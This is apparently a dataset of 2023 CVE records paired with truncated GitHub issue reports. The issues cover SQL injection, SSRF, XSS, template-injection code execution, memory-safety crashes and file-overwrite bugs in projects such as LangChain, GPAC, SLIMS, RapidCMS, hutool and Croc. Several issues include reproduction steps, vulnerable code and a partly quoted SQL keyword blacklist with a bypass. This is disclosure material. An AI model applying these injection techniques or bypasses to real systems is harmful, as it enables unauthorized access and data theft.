"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://aisec.today/LangChain-2e6244a313dd46139c5ef28cbcab9e55"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "ht... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langchain:langchain:0.0.171:*:*:*:*:*:*:*",
"matchCriteriaId": "D8235D79-2666-4DEE-B6A2-A5DE48FB42C6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | https://github.com/hwchase17/langchain/issues/4394 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"hwchase17",
"langchain"
] | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- ... | Template injection to arbitrary code execution | https://api.github.com/repos/langchain-ai/langchain/issues/4394/comments | 4 | 2023-05-09T12:28:24Z | 2023-10-10T15:15:44Z | https://github.com/langchain-ai/langchain/issues/4394 | 1,701,910,416 | 4,394 |
CVE-2023-38666 | 2023-08-22T19:16:39.170 | Bento4 v1.6.0-639 was discovered to contain a segmentation violation via the AP4_Processor::ProcessFragments function in mp4encrypt. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/784"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*",
"matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/axiomatic-systems/Bento4/issues/784 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | # Summary
Hi, developers of Bento4:
I tested the binary mp4encrypt with my fuzzer, and a crash incurred—SEGV on unknown address. The following is the details.
# Bug
Detected SEGV on unknown address in mp4encrypt.
```
root@2e47aa8b3277:/fuzz-mp4encrypt-ACBC/mp4encrypt# ./mp4encrypt --method MARLIN-IPMP-ACBC ..... | SEGV on unknown address 0x000000000028 in mp4encrypt | https://api.github.com/repos/axiomatic-systems/Bento4/issues/784/comments | 0 | 2022-10-02T04:35:03Z | 2023-05-29T02:51:17Z | https://github.com/axiomatic-systems/Bento4/issues/784 | 1,393,638,825 | 784 |
CVE-2023-41105 | 2023-08-23T07:15:08.590 | An issue was discovered in Python 3.11 through 3.11.4. If a path containing '\0' bytes is passed to os.path.normpath(), the path will be truncated unexpectedly at the first '\0' byte. There are plausible cases in which an application would have rejected a filename for security reasons in Python 3.10.x or earlier, but t... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/python/cpython/issues/106242"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/python/cpython/pull/107981"
},
{
"source": "cve@m... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "445B042E-9410-42E8-8749-A5EAEF2FF93D",
"versionEndExcluding": null,
"versionEndIncluding": "3.11.4",
"versionStartExcludin... | https://github.com/python/cpython/issues/106242 | [
"Issue Tracking",
"Patch"
] | github.com | [
"python",
"cpython"
] | # Bug report
Looks like `posix._path_normpath` has slightly different behaviour to the python implementation of `normpath` defined in `posixpath`, as such `os.path.normpath` behaves differently on Python 3.11 (where `posix._path_normpath` is used if it exists) vs 3.10 on posix systems:
Python 3.10:
```python
>>... | os.path.normpath truncates input on null bytes in 3.11, but not 3.10 | https://api.github.com/repos/python/cpython/issues/106242/comments | 9 | 2023-06-29T12:51:07Z | 2023-08-28T14:00:55Z | https://github.com/python/cpython/issues/106242 | 1,780,762,234 | 106,242 |
CVE-2023-39562 | 2023-08-28T19:15:07.747 | GPAC v2.3-DEV-rev449-g5948e4f70-master was discovered to contain a heap-use-after-free via the gf_bs_align function at bitstream.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ChanStormstout/Pocs/blob/master/gpac_POC/id%3A000000%2Csig%3A06%2Csrc%3A003771%2Ctime%3A328254%2Cexecs%3A120473%2Cop%3Ahavoc%2Crep%3A8"
},
{
"source": "cve@mitre.org",
"tags": [
"Explo... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3:2.3-dev-rev449-g5948e4f70-master:*:*:*:*:*:*",
"matchCriteriaId": "EE4D79B3-5867-4201-AB50-8CF590E4260B",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | https://github.com/gpac/gpac/issues/2537 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"gpac",
"gpac"
] | # Description
While fuzzing yasm, a "heap-use-after-free" crash occurs,which was positioned in /gpac/src/utils/bitstream.c:1225:19 in gf_bs_align.
This bug may allow attackers to cause remote malicious code execution and denial of service via crafted files.
# Software version info
```
/AFLplusplus/my_test/fuzz_g... | A `heap-use-after-free` crash in bitstream.c:1225:19 in gf_bs_align | https://api.github.com/repos/gpac/gpac/issues/2537/comments | 0 | 2023-07-24T13:14:16Z | 2023-07-24T14:34:56Z | https://github.com/gpac/gpac/issues/2537 | 1,818,405,399 | 2,537 |
CVE-2023-40781 | 2023-08-28T22:15:09.157 | Buffer Overflow vulnerability in Libming Libming v.0.4.8 allows a remote attacker to cause a denial of service via a crafted .swf file to the makeswf function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/libming/libming/issues/288"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/libming/libming/issues/288 | [
"Issue Tracking",
"Patch"
] | github.com | [
"libming",
"libming"
] | A heap buffer overflow occurs when makeswf parse a invalid swf file, and the filename extension is `.swf`.
## Test Environment
Ubuntu 20.04, 64 bit
libming (master 04aee52)
## Steps to reproduce
1. compile libming with ASAN
```
$ CC="clang -fsanitize=address,fuzzer-no-link -g" CFLAGS+=" -fcommon" ./configu... | heap-buffer-overflow in r_readc() at fromswf.c:264 | https://api.github.com/repos/libming/libming/issues/288/comments | 0 | 2023-08-09T02:43:36Z | 2023-08-09T02:43:36Z | https://github.com/libming/libming/issues/288 | 1,842,363,544 | 288 |
CVE-2023-40969 | 2023-09-01T11:15:42.800 | Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to Server Side Request Forgery (SSRF) via admin/modules/bibliography/pop_p2p.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/komangsughosa/CVE-ID-not-yet/blob/main/slims/slims9_bulian-9.6.1-SSRF-pop_p2p.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/s... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "548C3132-1CC1-446F-90FC-3411038DFAAB",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | https://github.com/slims/slims9_bulian/issues/204 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"slims",
"slims9_bulian"
] | # The bug
A Server Side Request Forgery exists in `admin/modules/bibliography/pop_p2p.php` at the code below
```php
$detail_uri = $_GET['uri'] . "/index.php?p=show_detail&inXML=true&id=" . $_GET['biblioID'];
// parse XML
$data = modsXMLsenayan($detail_uri, 'uri');
```
# To Reproduce
**Steps to reproduce t... | [Security Bugs] Server Side Request Forgery at pop_p2p.php | https://api.github.com/repos/slims/slims9_bulian/issues/204/comments | 2 | 2023-08-17T17:57:57Z | 2023-08-30T07:30:34Z | https://github.com/slims/slims9_bulian/issues/204 | 1,855,462,115 | 204 |
CVE-2023-40970 | 2023-09-01T11:15:42.923 | Senayan Library Management Systems SLIMS 9 Bulian v 9.6.1 is vulnerable to SQL Injection via admin/modules/circulation/loan_rules.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/komangsughosa/CVE-ID-not-yet/blob/main/slims/slims9_bulian-9.6.1-SQLI-loan_rules.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.co... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:slims:senayan_library_management_system:9.6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "548C3132-1CC1-446F-90FC-3411038DFAAB",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | https://github.com/slims/slims9_bulian/issues/205 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"slims",
"slims9_bulian"
] | # The bug
A SQL Injection exists in `admin/modules/circulation/loan_rules.php` at the code below
```php
/* RECORD OPERATION */
if (isset($_POST['saveData'])) {
$data['member_type_id'] = $_POST['memberTypeID'];
$data['coll_type_id'] = $_POST['collTypeID'];
$data['gmd_id'] = $_POST['gmdID'];
$da... | [Security Bugs] SQL Injection at loan_rules.php | https://api.github.com/repos/slims/slims9_bulian/issues/205/comments | 3 | 2023-08-18T14:09:37Z | 2023-09-01T06:50:58Z | https://github.com/slims/slims9_bulian/issues/205 | 1,856,790,763 | 205 |
CVE-2023-36100 | 2023-09-01T16:15:07.967 | An issue was discovered in IceCMS version 2.0.1, allows attackers to escalate privileges and gain sensitive information via UserID parameter in api/User/ChangeUser. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Thecosy/IceCMS/issues/15"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:macwk:icecms:2.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "C8043F07-E915-49DC-A4D8-DC34AC2B9770",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding... | https://github.com/Thecosy/IceCMS/issues/15 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Thecosy",
"IceCMS"
] | api:/api/User/ChangeUser/(self_token)
Calling this interface, we can modify the information of any user by modifying the UserID field.there will be no validation

Try to log in to user test39, it goes well

黑名单如下:" exec |peformance_s... | jeecgboot3.5.3 存在未授权sql注入(布尔盲注绕过) | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/5311/comments | 5 | 2023-08-25T14:24:01Z | 2023-09-21T03:43:26Z | https://github.com/jeecgboot/JeecgBoot/issues/5311 | 1,867,152,632 | 5,311 |
CVE-2023-42276 | 2023-09-08T22:15:11.740 | hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/dromara/hutool/issues/3286"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:5.8.21:*:*:*:*:*:*:*",
"matchCriteriaId": "EBFA93D9-F18F-4939-BF26-89603CD7148D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/dromara/hutool/issues/3286 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"dromara",
"hutool"
] |
### 版本情况
JDK版本: 1.8.0_362
hutool版本: 5.8.21
### 问题描述(包括截图)
1. 复现代码
```java
import cn.hutool.json.JSONObject;
public class JSONObjectTest {
public static void main(String[] args) {
JSONArray jSONArray = new JSONArray();
Object element = new Object();
jSONArray.add(1... | `JSONArray`的`add()`方法抛出OutOfMemory异常 | https://api.github.com/repos/dromara/hutool/issues/3286/comments | 2 | 2023-08-30T09:51:25Z | 2023-09-12T03:28:46Z | https://github.com/dromara/hutool/issues/3286 | 1,873,333,053 | 3,286 |
CVE-2023-42277 | 2023-09-08T22:15:11.863 | hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonObject.putByPath. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/dromara/hutool/issues/3285"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:5.8.21:*:*:*:*:*:*:*",
"matchCriteriaId": "EBFA93D9-F18F-4939-BF26-89603CD7148D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/dromara/hutool/issues/3285 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"dromara",
"hutool"
] | ### 版本情况
JDK版本: 1.8.0_362
hutool版本: 5.8.21
### 问题描述(包括截图)
1. 复现代码
```java
import cn.hutool.json.JSONObject;
public class JSONObjectTest {
public static void main(String[] args) {
JSONObject jSONObject = new JSONObject();
Object value = new Object();
jSONObject.putBy... | `putByPath()`方法抛出OutOfMemory异常 | https://api.github.com/repos/dromara/hutool/issues/3285/comments | 1 | 2023-08-30T08:22:07Z | 2023-08-30T13:52:31Z | https://github.com/dromara/hutool/issues/3285 | 1,873,179,897 | 3,285 |
CVE-2023-42278 | 2023-09-08T22:15:12.037 | hutool v5.8.21 was discovered to contain a buffer overflow via the component JSONUtil.parse(). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/dromara/hutool/issues/3289"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:5.8.21:*:*:*:*:*:*:*",
"matchCriteriaId": "EBFA93D9-F18F-4939-BF26-89603CD7148D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/dromara/hutool/issues/3289 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"dromara",
"hutool"
] | ### 版本情况
JDK版本: 1.8.0_362
hutool版本: 5.8.21
### 问题描述(包括截图)
1. 复现代码
```java
import cn.hutool.json.JSONUtil;
public class JSONOUtilTest {
public static void main(String[] args) {
String s = "{\"G\":00,[,,[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9... | `JSONUtil.parse()`方法解析特定输入时,会导致服务挂起和崩溃,存在安全隐患 | https://api.github.com/repos/dromara/hutool/issues/3289/comments | 5 | 2023-09-04T02:58:25Z | 2023-09-14T07:12:52Z | https://github.com/dromara/hutool/issues/3289 | 1,879,420,551 | 3,289 |
CVE-2023-41000 | 2023-09-11T15:16:02.307 | GPAC through 2.2.1 has a use-after-free vulnerability in the function gf_bifs_flush_command_list in bifs/memory_decoder.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2550"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "047BC15F-5E51-48D9-B751-9DC9311FEBCF",
"versionEndExcluding": null,
"versionEndIncluding": "2.2.1",
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/2550 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [Y ] I looked for a similar issue and couldn't find any.
- [Y] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [Y] I give enough information for contributors to reproduce my issue
**Description**
There is a Null Pointer Dereference detected by Ad... | Null Pointer Dereference in function BS_ReadByte | https://api.github.com/repos/gpac/gpac/issues/2550/comments | 4 | 2023-08-08T07:09:38Z | 2023-09-11T12:40:06Z | https://github.com/gpac/gpac/issues/2550 | 1,840,701,677 | 2,550 |
CVE-2023-5015 | 2023-09-17T02:15:07.430 | A vulnerability was found in UCMS 1.4.7. It has been classified as problematic. Affected is an unknown function of the file ajax.php?do=strarraylist. The manipulation of the argument strdefault leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "NONE",
... | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Num-Nine/CVE/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https:... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ucms_project:ucms:1.4.7:*:*:*:*:*:*:*",
"matchCriteriaId": "5498798F-9AC7-4309-B2E9-90B8959E70F2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/Num-Nine/CVE/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Num-Nine",
"CVE"
] | 1.Download address: https://github.com/forget-code/ucms
2.Vulnerability file location: http://127.0.0.1/CVE-Target/ucms-master/ucms/ajax.php? do=strarraylist
3.You need to manually create the cache and uploadfile directories during program installation
4.Ucms-master /ucms/ajax.php installed successfully? do=st... | The ucms has xss | https://api.github.com/repos/QianGeG/CVE/issues/3/comments | 0 | 2023-09-06T03:31:30Z | 2023-09-06T03:31:30Z | https://github.com/QianGeG/CVE/issues/3 | 1,883,115,340 | 3 |
CVE-2023-5031 | 2023-09-18T02:15:51.220 | A vulnerability was found in OpenRapid RapidCMS 1.3.1. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/article/article-add.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yhy217/rapidcms-vul/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.239875"
},
{
"source": "cn... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/yhy217/rapidcms-vul/issues/1 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yhy217",
"rapidcms-vul"
] | **RapidCMS Dev.1.3.1 was discovered to contain SQL injection(post) vulnerability in /admin/article/article-add-run.php. **
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/OpenRapid/rapidcms
[Affected Product Code Base]
RapidCMS Dev.1.3.1
[Affected Component]
File: /admin/article/a... | the sql injection in background of rapidcms ---1 | https://api.github.com/repos/yhy217/rapidcms-vul/issues/1/comments | 0 | 2023-09-17T09:38:55Z | 2023-09-17T10:04:06Z | https://github.com/yhy217/rapidcms-vul/issues/1 | 1,899,721,898 | 1 |
CVE-2023-5032 | 2023-09-18T04:15:11.327 | A vulnerability was found in OpenRapid RapidCMS 1.3.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/article/article-edit-run.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to t... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yhy217/rapidcms-vul/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/yhy217/rapidcms-vul/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yhy217",
"rapidcms-vul"
] | SQL injection vulnerability exists in
RapidCMS Dev.1.3.1
[Suggested description]
RapidCMS Dev.1.3.1 was discovered to contain SQL injection vulnerability in /admin/article/article-edit-run.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/OpenRapid/rapidcms
[Affected Product C... | SQL injection vulnerability exists in RapidCMS Dev.1.3.1 | https://api.github.com/repos/yhy217/rapidcms-vul/issues/2/comments | 0 | 2023-09-17T14:41:57Z | 2023-09-17T14:55:15Z | https://github.com/yhy217/rapidcms-vul/issues/2 | 1,899,806,533 | 2 |
CVE-2023-5033 | 2023-09-18T05:15:07.417 | A vulnerability classified as critical has been found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file /admin/category/cate-edit-run.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yhy217/rapidcms-vul/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openrapid:rapidcms:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D66CF166-4A08-45F5-9577-38D3CE25AFBA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/yhy217/rapidcms-vul/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yhy217",
"rapidcms-vul"
] | SQL injection vulnerability exists in RapidCMS Dev.1.3.1
[Suggested description]
RapidCMS Dev.1.3.1 was discovered to contain SQL injection vulnerability in /admin/category/cate-edit-run.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/OpenRapid/rapidcms
[Affected Product Code Base]
... | SQL injection vulnerability exists in RapidCMS Dev.1.3.1 --2 | https://api.github.com/repos/yhy217/rapidcms-vul/issues/3/comments | 0 | 2023-09-17T15:10:01Z | 2023-09-17T15:10:01Z | https://github.com/yhy217/rapidcms-vul/issues/3 | 1,899,815,211 | 3 |
CVE-2023-43616 | 2023-09-20T06:15:10.523 | An issue was discovered in Croc through 9.6.5. A sender can cause a receiver to overwrite files during ZIP extraction. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/09/21/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:schollz:croc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B173A01-5175-444D-9651-68AD4E2C30C2",
"versionEndExcluding": null,
"versionEndIncluding": "9.6.5",
"versionStartExcluding"... | https://github.com/schollz/croc/issues/594 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"schollz",
"croc"
] | As mentioned in issue #593 there is a check on the receiver side of Croc whether an incoming file path will overwrite an existing file, and Croc will ask the user interactively whether it should be overwritten, if it already exists. This check works reasonably well, even if symlinks are involved. I did not look that de... | Interactive File Overwrite Prompt can be Circumvented by Sending ZIP file | https://api.github.com/repos/schollz/croc/issues/594/comments | 4 | 2023-09-08T11:23:36Z | 2024-05-20T15:33:12Z | https://github.com/schollz/croc/issues/594 | 1,887,485,959 | 594 |
CVE-2023-43617 | 2023-09-20T06:15:10.617 | An issue was discovered in Croc through 9.6.5. When a custom shared secret is used, the sender and receiver may divulge parts of this secret to an untrusted Relay, as part of composing a room name. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/09/21/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/schollz/cr... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:schollz:croc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B173A01-5175-444D-9651-68AD4E2C30C2",
"versionEndExcluding": null,
"versionEndIncluding": "9.6.5",
"versionStartExcluding"... | https://github.com/schollz/croc/issues/596 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"schollz",
"croc"
